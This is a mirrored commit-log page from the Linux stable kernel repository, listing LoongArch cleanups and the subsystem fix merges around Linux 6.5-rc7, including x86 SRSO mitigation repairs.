mirror of
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git
synced 2025-01-04 04:06:26 +00:00
55b46ff939
1201769 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
Masahiro Yamada
|
55b46ff939 |
LoongArch: Replace #include <asm/export.h> with #include <linux/export.h>
Commit
|
||
|
Masahiro Yamada
|
347aa8dec2 |
LoongArch: Remove unneeded #include <asm/export.h>
There is no EXPORT_SYMBOL() line there, hence #include <asm/export.h> is unneeded. Signed-off-by: Masahiro Yamada <masahiroy@kernel.org> Signed-off-by: Huacai Chen <chenhuacai@loongson.cn> |
||
|
WANG Xuerui
|
3f301dc292 |
LoongArch: Replace -ffreestanding with finer-grained -fno-builtin's
As explained by Nick in the original issue: the kernel usually does a good job of providing library helpers that have similar semantics as their ordinary userspace libc equivalents, but -ffreestanding disables such libcall optimization and other related features in the compiler, which can lead to unexpected things such as CONFIG_FORTIFY_SOURCE not working (!). However, due to the desire for better control over unaligned accesses with respect to CONFIG_ARCH_STRICT_ALIGN, and also for avoiding the GCC bug https://gcc.gnu.org/PR109465, we do want to still disable optimizations for the memory libcalls (memcpy, memmove and memset for now). Use finer-grained -fno-builtin-* toggles to achieve this without losing source fortification and other libcall optimizations. Closes: https://github.com/ClangBuiltLinux/linux/issues/1897 Reported-by: Nathan Chancellor <nathan@kernel.org> Suggested-by: Nick Desaulniers <ndesaulniers@google.com> Signed-off-by: WANG Xuerui <git@xen0n.name> Signed-off-by: Huacai Chen <chenhuacai@loongson.cn> |
||
|
Xi Ruoyao
|
b8e2771b7f |
LoongArch: Remove redundant "source drivers/firmware/Kconfig"
In drivers/Kconfig, drivers/firmware/Kconfig is sourced for all ports so there is no need to source it in the port-specific Kconfig file. And sourcing it here also caused the "Firmware Drivers" menu appeared two times: one in the "Device Drivers" menu, another in the toplevel menu. This is really puzzling so remove it. Reviewed-by: Randy Dunlap <rdunlap@infradead.org> Signed-off-by: Xi Ruoyao <xry111@xry111.site> Signed-off-by: Huacai Chen <chenhuacai@loongson.cn> |
||
|
Linus Torvalds
|
706a741595 | Linux 6.5-rc7 | ||
|
Linus Torvalds
|
b320441c04 |
TTY/Serial fixes for 6.5-rc7
Here are some small tty and serial core fixes for 6.5-rc7 that resolve a lot of reported issues. Primarily in here is the fixes for the serial bus code from Tony that came in -rc1, as it hit wider testing with the huge number of different types of systems and serial ports. All of the reported issues with duplicate names and other issues with this code are now resolved. Other than that included in here is: - n_gsm fix for a previous fix - 8250 lockdep annotation fix - fsl_lpuart serial driver fix - TIOCSTI documentation update for previous CAP_SYS_ADMIN change All of these have been in linux-next for a while with no reported problems. Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> -----BEGIN PGP SIGNATURE----- iG0EABECAC0WIQT0tgzFv3jCIUoxPcsxR9QN2y37KQUCZOEjmg8cZ3JlZ0Brcm9h aC5jb20ACgkQMUfUDdst+ykpSgCfajOM7BUzL1kOrfKNvHQuPmOYlIUAnAot+4M+ HkvS58Xs2+PM14y/KG1j =6DRj -----END PGP SIGNATURE----- Merge tag 'tty-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty Pull tty/serial fixes from Greg KH: "Here are some small tty and serial core fixes for 6.5-rc7 that resolve a lot of reported issues. Primarily in here are the fixes for the serial bus code from Tony that came in -rc1, as it hit wider testing with the huge number of different types of systems and serial ports. All of the reported issues with duplicate names and other issues with this code are now resolved. Other than that included in here is: - n_gsm fix for a previous fix - 8250 lockdep annotation fix - fsl_lpuart serial driver fix - TIOCSTI documentation update for previous CAP_SYS_ADMIN change All of these have been in linux-next for a while with no reported problems" * tag 'tty-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty: serial: core: Fix serial core port id, including multiport devices serial: 8250: drop lockdep annotation from serial8250_clear_IER() tty: n_gsm: fix the UAF caused by race condition in gsm_cleanup_mux serial: core: Revert port_id use TIOCSTI: Document CAP_SYS_ADMIN behaviour in Kconfig serial: 8250: Fix oops for port->pm on uart_change_pm() serial: 8250: Reinit port_id when adding back serial8250_isa_devs serial: core: Fix kmemleak issue for serial core device remove MAINTAINERS: Merge TTY layer and serial drivers serial: core: Fix serial_base_match() after fixing controller port name serial: core: Fix serial core controller port name to show controller id serial: core: Fix serial core port id to not use port->line serial: core: Controller id cannot be negative tty: serial: fsl_lpuart: Clear the error flags by writing 1 for lpuart32 platforms |
||
|
Linus Torvalds
|
ec27a636d7 |
Rust fixes for 6.5-rc7
- Macros: fix 'HAS_*' redefinition by the '#[vtable]' macro
under conditional compilation.
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEEPjU5OPd5QIZ9jqqOGXyLc2htIW0FAmThFSQACgkQGXyLc2ht
IW1H5w/7BrYr2h+KYBtpDKagivO1Gm+OnIY0T2cN/bv+6Wt3XFqjyXrlUpQYZpVA
s6V7W7ihJ2+HThGIZNrrjtFX/MetRxc4PT8RH3ixOkd7yggPfHegRGI59QNrHeAB
9Z8hhhTp2qqcBq4asA+5twsO6HBuGAfVRCyi62dhfmq3fGUGhp7PWKrIOZ+Fd5bX
SgU0uqHJegyXSx5obH5pwMM+CMr6+obgM99DWMCbKEysS1kEapZg8o5jQ+8wmpsh
vnUfMt7vtWVrd1KHV+lyVJz1VgugQudfd3YyO1RueAc8uq1sNexTTgz7wqDDLiN2
KuGIVFt5+iMcgUbRzPA87muArpIOBJntjt20i4HUb+Xj5lp8raLUuvs1lF6iPvbK
WqxGhpnA81UuYnWpshUx0iqv6lZFIYZ2WlhGcvQcpCKVkWdCgEUDRMdi9ZRvCRyQ
2ezye2c8sBhjvSmKcvQSMWY2sE3IQ4MRqbyiV9qnXnLe83FNDX5VuFAsShBKFpsa
A4I6LkCVWjBcLTDi+ggg6cAzWTQtULzi7acwWS3qw4W0Yj/jtHH4Ire9EljW/CV/
CvM+7p59Ff18h28Pz6dip5s/n1VEVZozeTOIonw9p28Na+5Y+pUbRkpoZZh6mYhW
So55wSLR4TT7lYY9W1PgW5NEcTZm0BuJ9ZJwNsySy5NU7kWfvZk=
=McGU
-----END PGP SIGNATURE-----
Merge tag 'rust-fixes-6.5-rc7' of https://github.com/Rust-for-Linux/linux
Pull rust fix from Miguel Ojeda:
- Macros: fix 'HAS_*' redefinition by the '#[vtable]' macro
under conditional compilation
* tag 'rust-fixes-6.5-rc7' of https://github.com/Rust-for-Linux/linux:
rust: macros: vtable: fix `HAS_*` redefinition (`gen_const_name`)
|
||
|
Linus Torvalds
|
9e6c269de4 |
Usual set of driver fixes. A bit more than usual because I was
unavailable for a while. -----BEGIN PGP SIGNATURE----- iQIzBAABCgAdFiEEOZGx6rniZ1Gk92RdFA3kzBSgKbYFAmTg7RsACgkQFA3kzBSg KbbVXw/9GjnFwj0sazyKuHJdE3l3lP5RbWPhO9lF4pwSG2XAyVMLjpcsN27LvrKl eu19hAu0a6C/PlUgYieCak/yl/9Xv08gxAcyI+PquAVtJ2XuWtsDUc0y1Rq2O53v xFtQEy5eARWH3hI7f2rBbZWpgIXit7Xd+WLNRREttQgRRN8L9qmOwiZKuG2S2UQa QMFn6qcOccwtkkvv992sZ4Pw54d9nOFCxKNim0TCiEKL9lgIelnrCJzqpw+yFRz/ a/bDtb2lLJGHeaSsjCH4dyobecLLXd/DtJSenCCGJUpfQ9cU9AqZDH/EUKQEUHyQ p+LbixN/0viDZALwMzsXxPp+HuSouYr9m6s0ZstMUO73y9ydhaSoquq0f5eRjKbI PRyhtBw55QLduoOITPcyPMwBxEIxXWhoNbF4hRnpdIRzLQ/JB+kO5a3RZ4BYFMP1 Rjz3vBKf2xzxlHJStYltNexmgPQ8PsfC6b7VJdyTOV74KUBADvWXPlBH/1tsppDX wwQMrYE7ouzhJ1ypq6sDj7/ERjw9+0+XVbnlyEi6S9XXx1OkzHN6HMZWC34LCXiR NXowjvU3O22wTnK3jzo2rIbJ+FPOYcaLcqV87vBCWigEByJ9jGxrwBBy2y4qsmyI MpwwiXEuODdA1OEByxkCY3U5bfIjdW7QzPGb6tJEPJNWjFOHG3w= =mRg9 -----END PGP SIGNATURE----- Merge tag 'i2c-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/wsa/linux Pull i2c fixes from Wolfram Sang: "Usual set of driver fixes. A bit more than usual because I was unavailable for a while" * tag 'i2c-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/wsa/linux: i2c: bcm-iproc: Fix bcm_iproc_i2c_isr deadlock issue i2c: Update documentation to use .probe() again i2c: sun6i-p2wi: Fix an error message in probe() i2c: hisi: Only handle the interrupt of the driver's transfer i2c: tegra: Fix i2c-tegra DMA config option processing i2c: tegra: Fix failure during probe deferral cleanup i2c: designware: Handle invalid SMBus block data response length value i2c: designware: Correct length byte validation logic i2c: imx-lpi2c: return -EINVAL when i2c peripheral clk doesn't work |
||
|
Linus Torvalds
|
12e6ccedb3 |
for-6.5-rc6-tag
-----BEGIN PGP SIGNATURE----- iQIzBAABCgAdFiEE8rQSAMVO+zA4DBdWxWXV+ddtWDsFAmTgyQQACgkQxWXV+ddt WDvqSQ/+PFg0GwssGuiqWTGbfHV2bJCJWeuXUJNuKFo8PtEnpN0zf28ihsaRXAHF ZDFKrRjEmb62n+EWJFDpC7wmnz6UJEoEtQteN2VBnLSIUQAKFI+g5flXrR85rk1D d52JSXtaXSZeCtZH/wdYWdfkL19SJQqJrFDY1WmRLCylOsLHuG0a67fXNeL+5WM/ NgGUMk0bO/j2CKjiCwJT4EpsSP4tFj49TciuDESyXnS8aDbPLbAQkGpYlE+99HSj D3vjZeqdVfmVhSjdIrK2eTlndzCl+HU+J1DXHzRE6I5XkXhzofJFtrlsvl++C9pv UZL9bFyMFzybKME33RWvzXBhiRguZ4hfGBoh5FQbJl4yErU4I5RVZcd3/S/2V6n+ AzWemwkOdLEiiPD+aLV28EYdKpnd4GFweVTxeXjdXrJrSx/e4Vn/kPNq1aZJi6Qi ex3hZWr0oN7JG/StN6i3ix09fEB8cyDzn/jaEwk5zb6uHVN8fw7whkVwZOvFkXx5 VcPxZOyxBFxwmN+L6JlxkIGEpu8UQC2RHa1JJzDTXJPqpz6W68d2wJ8jlDFJYUaf fahDd8FoG/e/EYh8sPsOnp3gMY53UxxWLF8fuZXVScq9+g5zA3jfftF+a3TaA5bh e119g0ml+KIGtTB7Q8nLob4PA12NNhNtHbKfdSPDhOfvz8heg9A= =eFDQ -----END PGP SIGNATURE----- Merge tag 'for-6.5-rc6-tag' of git://git.kernel.org/pub/scm/linux/kernel/git/kdave/linux Pull btrfs fixes from David Sterba: - fix infinite loop in readdir(), could happen in a big directory when files get renamed during enumeration - fix extent map handling of skipped pinned ranges - fix a corner case when handling ordered extent length - fix a potential crash when balance cancel races with pause - verify correct uuid when starting scrub or device replace * tag 'for-6.5-rc6-tag' of git://git.kernel.org/pub/scm/linux/kernel/git/kdave/linux: btrfs: fix incorrect splitting in btrfs_drop_extent_map_range btrfs: fix BUG_ON condition in btrfs_cancel_balance btrfs: only subtract from len_to_oe_boundary when it is tracking an extent btrfs: fix replace/scrub failure with metadata_uuid btrfs: fix infinite directory reads |
||
|
Linus Torvalds
|
b5cab28be6 |
fbdev fixes and cleanups for 6.5-rc7:
- various code cleanups in amifb, atmel_lcdfb, ssd1307fb, kyro and goldfishfb -----BEGIN PGP SIGNATURE----- iHUEABYKAB0WIQS86RI+GtKfB8BJu973ErUQojoPXwUCZODeUwAKCRD3ErUQojoP X4RvAP97hetBNJFMw3N34QT4TYT3NUAhR12z73YFTi/PeKVSMgEA4nQHXuSP5Ymv 5+FNFsEHGJs6p25AMDc6oDKTYkVuMQc= =PYOb -----END PGP SIGNATURE----- Merge tag 'fbdev-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/deller/linux-fbdev Pull fbdev fixes and cleanups from Helge Deller: - various code cleanups in amifb, atmel_lcdfb, ssd1307fb, kyro and goldfishfb * tag 'fbdev-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/deller/linux-fbdev: fbdev: goldfishfb: Do not check 0 for platform_get_irq() fbdev: atmel_lcdfb: Remove redundant of_match_ptr() fbdev: kyro: Remove unused declarations fbdev: ssd1307fb: Print the PWM's label instead of its number fbdev: mmp: fix value check in mmphw_probe() fbdev: amifb: Replace zero-length arrays with DECLARE_FLEX_ARRAY() helper |
||
|
Linus Torvalds
|
2383ffc41a |
block-6.5-2023-08-19
-----BEGIN PGP SIGNATURE----- iQJEBAABCAAuFiEEwPw5LcreJtl1+l5K99NY+ylx4KYFAmTg19oQHGF4Ym9lQGtl cm5lbC5kawAKCRD301j7KXHgpmLjD/wKs0hA4JOQDqZPZK1p1aBU4f0vXwQxFGlL +gcnO4/MIB/5Ud+T+SXYuMrimLws7xsVbymcGatiRjH8LTfJVXFhuAzLILi0AcHw nhzjOUEzHokUex+tZLZRZxmavR+9SyGJoFNIbh+mY8JOLdNVzFDSqnLWO+D02Q2R OOBupA0mLRelYODEm2rI4xlQndwfrOAoAyEv+R7Ug0F6bFSno36QOg64pmZVI0Fl eudORXnIRYdtUajv+kNATWoqBbq/UCuBJdk0veM07Try6ZGRXRh6dQSA+GRh93pE Zg3JAHj4MKwlP3/wglw3SzoeECHpZrKQavIQQe9pTWKP4xGI/jdbVBcyFE0ERc66 HijMo6CLeAzpOI1nEv+QhD8ntr4polEiWL4EVLuoXE9fVI1mYzavqmqrsDHeOHeF IJHadXZwsTG243msDvqedy0RFBwAkpnK0XdQuDtMnSa7UHwWWbxwUOwO5p4COJ3g vmrCfPQr7TTgkOtAXoMnwOZ1troEGxa/2CdUKaTdVG8RkMeM2qy8tmBBTV9Bx6+i rwQbB/JJm5SE6DX309TRaR6w+5YiwR6e7ECKx5hdYXia7M3OxlBBvl1NOfiWjWE3 abC38/FReHLmFKHaDaN2AM1vLy+duc4NEc/yMQ4FDcfj/hUHQCoZBPYUsvlC+a4e Ws4qoMLU8A== =LnzH -----END PGP SIGNATURE----- Merge tag 'block-6.5-2023-08-19' of git://git.kernel.dk/linux Pull block fixes from Jens Axboe: "Main thing here is the fix for the regression in flush handling which caused IO hangs/stalls for a few reporters. Hopefully that should all be sorted out now. Outside of that, just a few minor fixes for issues that were introduced in this cycle" * tag 'block-6.5-2023-08-19' of git://git.kernel.dk/linux: blk-mq: release scheduler resource when request completes blk-crypto: dynamically allocate fallback profile blk-cgroup: hold queue_lock when removing blkg->q_node drivers/rnbd: restore sysfs interface to rnbd-client |
||
|
Chengming Zhou
|
e5c0ca1365 |
blk-mq: release scheduler resource when request completes
Chuck reported [1] an IO hang problem on NFS exports that reside on SATA devices and bisected to commit |
||
|
Linus Torvalds
|
aa9ea98cca |
media fixes for v6.5-rc7
-----BEGIN PGP SIGNATURE----- iQIzBAABCAAdFiEE+QmuaPwR3wnBdVwACF8+vY7k4RUFAmTc0qUACgkQCF8+vY7k 4RXRqQ//RPlpmt65W0iXWkGjfqIJENhPpjC18ae3UWkK7ecSfV9PY8rOUmDea31H SrJCMjDjHB2FkIQlQ0Ljx16X+MIiJZYPsk2PfsF0kTsvbIvz7ZD6zYW0ZJW7PtNL TDh9nNMQrKPH6H1BjSmDK18jz6IyQu7aCSi4rVd5NjzvIltgo7O/GFo3+8PtZA0j aa0KbB7ginzAjZSefbqy7uSF6ca0u/VNmp1J3yGeCPUsPnUJUSOeSmtAx2deV0gM t6ICC79hyUJbpA1g9XE3Yj6oOT1GgHbWAG8cstEXTnK7F/u1uKTNyMOhrcEF1fnf hN4it5Q9kujmN6dfk6R9q8boes3omtEKyh6LIhjzAVqvOCY9R3BnCzfUkYfWfXRq Uu51I8kXQTc2bm3nFKk3323JcfZuZkAkwl2GKJJXMJFkYxux3by8tyJI3IIRRfO5 HYj/WnoM1VoKQ4Voa76jCv8gUZNwWEFcgXIIf6X6UWf5pDAy36gZFqQ1Jtb6Hk8l VbWC+o+7pG+e770Iw/dYDTPLWG23/C0tMvr1ra+nBKFDx38u49nbpQKa7WEDWL9w X51ldQ+Oww/zOSh1l85ZPid0xyEtPBjmf8jc9Jui1XwneW9j/4M2FzLRvWmbyf2v 9EtxBXVVeWTCgEi2gthXqNGpfGMQJh+xaXpghnYzPPoYn3LI05M= =57HD -----END PGP SIGNATURE----- Merge tag 'media/v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-media Pull media fixes from Mauro Carvalho Chehab: "Three driver fixes" * tag 'media/v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-media: media: imx: imx7-media-csi: Fix applying format constraints media: uvcvideo: Fix menu count handling for userspace XU mappings media: mtk-jpeg: Set platform driver data earlier |
||
|
Linus Torvalds
|
bf98bae3d8 |
- Use LEA ...%rsp instead of ADD %rsp in the Zen1/2 SRSO return sequence
as latter clobbers flags which interferes with fastop emulation in
KVM, leading to guests freezing during boot
- A fix for the DIV(0) quotient data leak on Zen1 to clear the divider
buffers at the right time
- Disable the SRSO mitigation on unaffected configurations as it got
enabled there unnecessarily
- Change .text section name to fix CONFIG_LTO_CLANG builds
- Improve the optprobe indirect jmp check so that certain configurations
can still be able to use optprobes at all
- A serious and good scrubbing of the untraining routines by PeterZ:
- Add proper speculation stopping traps so that objtool is happy
- Adjust objtool to handle the new thunks
- Make the thunk pointer assignable to the different untraining
sequences at runtime, thus avoiding the alternative at the return
thunk. It simplifies the code a bit too.
- Add a entry_untrain_ret() main entry point which selects the
respective untraining sequence
- Rename things so that they're more clear
- Fix stack validation with FRAME_POINTER=y builds
- Fix static call patching to handle when a JMP to the return thunk is
the last insn on the very last module memory page
- Add more documentation about what each untraining routine does and
why
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEEzv7L6UO9uDPlPSfHEsHwGGHeVUoFAmTge4wACgkQEsHwGGHe
VUpgwRAAgP1dAq4c/DuLQh/+Mao/pM+EiNxwoDTNJ27ZoRfXG5vLXF3++TRkmFKB
ua+jEhkNTAH1xyF+um4exjUD2UC62UfNo4wBZPjl+jVmguHqpsNOsZj7M3+GRD+3
vRWspaOnNPKOIVdtvftaS6J3YavFUolwZSRC9HCFQiriX5zV4BlMZEJxkWw6LNW6
LeJt4qmbDXCIzmCRqEmtNBOhuWuMvhwWg9G1Aq4MLcHf+gHSEGNnY8Otl7YPPeqr
ys9vE5hQ3NiUmBkGnhw+Mj3gGFCL2fzWF0XqY8VCTPcYTVRFen7BmelhJVm7RhAr
wpXdyCU+bV4qrn2uRpBSbzH/DfxfQA2xbRtBR+L7x5ZbHamFyi17fN94AQv2WUXz
7TUdooWPuJLPQ2CHAgSChTEF/CZBl6pYHEorHkzA1GqV0omMT7hg8GEHn17JGI5v
FDPGYHuznsu59DhGNh7Wx4hLO10slvkSHly+se7eCaDr1hDIpJtiZLxn6n+SphZh
qzYc+Pxa3UcgNSxqqfOBqDWQQNdoYqx1ONao8nWgjj+/y0eIEf27uqIDT/o5tb7E
YejDq7xO00CartGm2g/0S0OvDvRTWbU0LoGMKNxo/HTD+goM8pa7vdE77g5NNSCy
wG0BnFWni53p66JJzzxxgPG39OYu9NR6ilcOTYT9jlPT3ZMySYg=
=ndko
-----END PGP SIGNATURE-----
Merge tag 'x86_urgent_for_v6.5_rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip
Pull x86 fixes from Borislav Petkov:
"Extraordinary embargoed times call for extraordinary measures. That's
why this week's x86/urgent branch is larger than usual, containing all
the known fallout fixes after the SRSO mitigation got merged.
I know, it is a bit late in the game but everyone who has reported a
bug stemming from the SRSO pile, has tested that branch and has
confirmed that it fixes their bug.
Also, I've run it on every possible hardware I have and it is looking
good. It is running on this very machine while I'm typing, for 2 days
now without an issue. Famous last words...
- Use LEA ...%rsp instead of ADD %rsp in the Zen1/2 SRSO return
sequence as latter clobbers flags which interferes with fastop
emulation in KVM, leading to guests freezing during boot
- A fix for the DIV(0) quotient data leak on Zen1 to clear the
divider buffers at the right time
- Disable the SRSO mitigation on unaffected configurations as it got
enabled there unnecessarily
- Change .text section name to fix CONFIG_LTO_CLANG builds
- Improve the optprobe indirect jmp check so that certain
configurations can still be able to use optprobes at all
- A serious and good scrubbing of the untraining routines by PeterZ:
- Add proper speculation stopping traps so that objtool is happy
- Adjust objtool to handle the new thunks
- Make the thunk pointer assignable to the different untraining
sequences at runtime, thus avoiding the alternative at the
return thunk. It simplifies the code a bit too.
- Add a entry_untrain_ret() main entry point which selects the
respective untraining sequence
- Rename things so that they're more clear
- Fix stack validation with FRAME_POINTER=y builds
- Fix static call patching to handle when a JMP to the return thunk
is the last insn on the very last module memory page
- Add more documentation about what each untraining routine does and
why"
* tag 'x86_urgent_for_v6.5_rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip:
x86/srso: Correct the mitigation status when SMT is disabled
x86/static_call: Fix __static_call_fixup()
objtool/x86: Fixup frame-pointer vs rethunk
x86/srso: Explain the untraining sequences a bit more
x86/cpu/kvm: Provide UNTRAIN_RET_VM
x86/cpu: Cleanup the untrain mess
x86/cpu: Rename srso_(.*)_alias to srso_alias_\1
x86/cpu: Rename original retbleed methods
x86/cpu: Clean up SRSO return thunk mess
x86/alternative: Make custom return thunk unconditional
objtool/x86: Fix SRSO mess
x86/cpu: Fix up srso_safe_ret() and __x86_return_thunk()
x86/cpu: Fix __x86_return_thunk symbol type
x86/retpoline,kprobes: Skip optprobe check for indirect jumps with retpolines and IBT
x86/retpoline,kprobes: Fix position of thunk sections with CONFIG_LTO_CLANG
x86/srso: Disable the mitigation on unaffected configurations
x86/CPU/AMD: Fix the DIV(0) initial fix attempt
x86/retpoline: Don't clobber RFLAGS during srso_safe_ret()
|
||
|
Linus Torvalds
|
4e7ffde698 |
powerpc fixes for 6.5 #6
- Fix hardened usercopy BUG when using /proc based firmware update interface. Thanks to: Nathan Lynch, Kees Cook. -----BEGIN PGP SIGNATURE----- iQJHBAABCAAxFiEEJFGtCPCthwEv2Y/bUevqPMjhpYAFAmTgYHETHG1wZUBlbGxl cm1hbi5pZC5hdQAKCRBR6+o8yOGlgEH1D/9C9c6jF5BFNmt9eApkvKO4yIY+4oRJ I7+ndtm7IM9M080gtJmZvn1P7hGY8UF0niH/8o2Q1Qg4IgwDIhPO49E5HgYbWxbo a+IoiJremW7XORSCvBObYpPy8N2twPWGNGjEGId0ahdbh/BxezB9/1GjsYlVHFgf rAnLaZtiAZPcWG1JEX1zyWXh5YN49jV1piylpxZM4EZA1ruiDbjUB0VScppcLZbq fyXIlsXJjlmNyxrjXTPtu5XQ6zZt4Me3qUgoIMniOTpDdHMBL/dVJ3IHoy4HwqBH VScDEJXBEtJxzZKcOUfZws82Xy8IFaVApUqLZNcb7zYxLh9xmSPibK+IVOiftfRP wuwbvL7UUarbRxsMoxcapCeeuWKGAMR+Nl3JyLJxhFGEDiO6qwmXXGxZvVTDYS48 s8hXpl9gT+e7csj66ZMTBqj8M+f6e50z4VbaR4bvRn/IKxxx60rkMpyeSUzK4zuB 5Ni4D7trz/W/RMQBsCjAku8MVGUIQwrVwi8zl1w7N90NKaEQZG21AN2csmdc3fSW V1EzVOX69NjQYMQIUjYuFBLOhq5SN4FNK9B83DKnJ9VFOb0o7oMd89AyCVTISpAb XoGQudE32y2dRKZKlxuvVYprm7X6JFxDnErOfn4ZUhfUTsYPssQswADY4aIRglbg juCcPY05ayydxQ== =z//y -----END PGP SIGNATURE----- Merge tag 'powerpc-6.5-6' of git://git.kernel.org/pub/scm/linux/kernel/git/powerpc/linux Pull powerpc fix from Michael Ellerman: - Fix hardened usercopy BUG when using /proc based firmware update interface Thanks to Nathan Lynch and Kees Cook. * tag 'powerpc-6.5-6' of git://git.kernel.org/pub/scm/linux/kernel/git/powerpc/linux: powerpc/rtas_flash: allow user copy to flash block cache objects |
||
|
Sweet Tea Dorminy
|
c984ff1423 |
blk-crypto: dynamically allocate fallback profile
blk_crypto_profile_init() calls lockdep_register_key(), which warns and
does not register if the provided memory is a static object.
blk-crypto-fallback currently has a static blk_crypto_profile and calls
blk_crypto_profile_init() thereupon, resulting in the warning and
failure to register.
Fortunately it is simple enough to use a dynamically allocated profile
and make lockdep function correctly.
Fixes:
|
||
|
Ming Lei
|
c164c7bc97 |
blk-cgroup: hold queue_lock when removing blkg->q_node
When blkg is removed from q->blkg_list from blkg_free_workfn(), queue_lock
has to be held, otherwise, all kinds of bugs(list corruption, hard lockup,
..) can be triggered from blkg_destroy_all().
Fixes:
|
||
|
Li Zhijian
|
6548fce058 |
drivers/rnbd: restore sysfs interface to rnbd-client
Commit |
||
|
Linus Torvalds
|
d4ddefee51 |
Two more SME fixes related to ptrace(): ensure that the SME is properly
set up for the target thread and that the thread sees the ZT registers set via ptrace. -----BEGIN PGP SIGNATURE----- iQIzBAABCgAdFiEE5RElWfyWxS+3PLO2a9axLQDIXvEFAmTftxwACgkQa9axLQDI XvFYOg/9HlGxpKuWlaNZ9g9pUXPdmCnlqBRbHkqDtPdPwH/Gylh3P5DFcRDFWCS0 74dls3iqQ0muAeKObB4EvfGTBRngX0HhEXTVnk81JFtTchVclzYtZa1J5+wO4c2Q UK/+iwRddGqTGUNQJWG9qEkV9FoaDOmnuV1ZSUDF+AiAzQloEJlWqPxnX3b+ZX33 agoEir1i8hhtfKVReappIxZHWEcGUiBCKMFtkTACaJkGucg6uaNM7vzhjfzYlCrB 3qxEQXCgTCjWTuzhOAAKi98Q/t8KP1Hcm4WGi6yLC16hyU/P3wy7HPL5s1CowROt /Ttkv9ux9W4ZUx8qmvWwmxjtFjmQZRAvcRGZg0XqdsnKul3NUCdVnXNWp+sGS8tk HVOtzTo5WlC+YKlO5uweTXBwS/hbH5M/mZPiEv4p3jsEVHpc43EUsM8RiLQRZPv7 6fllZXoSje2Npf2evTlwQqiDrSDe2fHxCiUbQ8NpLTD+tr9M2j0xCAbVJd7qhd9i PdbLHTKFgR0ScZCDcnWSUwqCSNIFUHQNhnvLaYx5PIWchOimE4HCcQZcM9mc7643 1jwGNIE2FP/7mLwoQNr/ri3rs0eYWXTZ6QaTXUmicCZnp4IhKKxeVzTmSSH67LRK DBcMUW4FXk85Z2dBgn3KbaMkdqAHcv4SAU3CzyfgWpJlb/z7/iI= =1dyE -----END PGP SIGNATURE----- Merge tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux Pull arm64 fixes from Catalin Marinas: "Two more SME fixes related to ptrace(): ensure that the SME is properly set up for the target thread and that the thread sees the ZT registers set via ptrace" * tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux: arm64/ptrace: Ensure that the task sees ZT writes on first use arm64/ptrace: Ensure that SME is set up for target when writing SSVE state |
||
|
Linus Torvalds
|
3e13eee105 |
gpio fixes for v6.5-rc6
- fix a regression in the sysfs interface - fix a reference counting bug that's been around for years - MAINTAINERS update -----BEGIN PGP SIGNATURE----- iQIzBAABCgAdFiEEFp3rbAvDxGAT0sefEacuoBRx13IFAmTftRUACgkQEacuoBRx 13IGjhAAoYc+s0YjdKki5g3IEvo163uhophnTywxU8EL6hNCTNn8f1JCiIVVJgro VuBXywozUPsPAJ8gszEEffNpJHLiFJzK2KAmYVf8diuUDkB1G4h5nfFBftXM7z5W Yf58I48WsY/Hd4SsThvARJQ8vPVsefwDo13grNGVVBA8mRBpMT1IbidEfLZfkygR DjXUP+UUoL2l2bd8wAcvc/HAS1sL86ckq/Fh/YGDezeFo0ukr1JIJ5fLa0u+9Gxu XpW7G2NVkEP2weP4UcqRJagM6iFlLN0/w9V/pj9BXSleA8zuWIcAV4bv689ckRu2 fczMdLVMoj/H/uIFB+kRUXfTxbQH35XwlelrV9S7ih2Ku7a+Y0kJ/4FsubO69nD+ tbJ9Ur9EOXSm2cKfklsZWFhMGxXQdSo8eqAQusoBgGqbzhUmK7d2FBMUcCyRejXj qPP+7otn+GbccYrZKuOqaj1hXfVtryWLEkazVrCnXpCWolx0722loav1EWnW/CVL 6s4Lbr+SdVe715m7AyhPCHr294BTyrWik13pjCoVJqD2IAklhcJa6GdEV6pxcLmP 7zyIix/5pqk0ICtIDw2yu18UhcHhKOjRCKgeL2SxD/U0a6Cz8g65OAc6ERorarbN f7MPmB5JHP5J3fColpnb9sTLgPKcTcBfYGi3rJZD7Ni6MprIkBY= =FSvM -----END PGP SIGNATURE----- Merge tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux Pull gpio fixes from Bartosz Golaszewski: - fix a regression in the sysfs interface - fix a reference counting bug that's been around for years - MAINTAINERS update * tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux: gpiolib: fix reference leaks when removing GPIO chips still in use gpiolib: sysfs: Do unexport GPIO when user asks for it MAINTAINERS: add content regex for gpio-regmap |
||
|
Linus Torvalds
|
8abd7287db |
small SMB mount option fix, also for stable
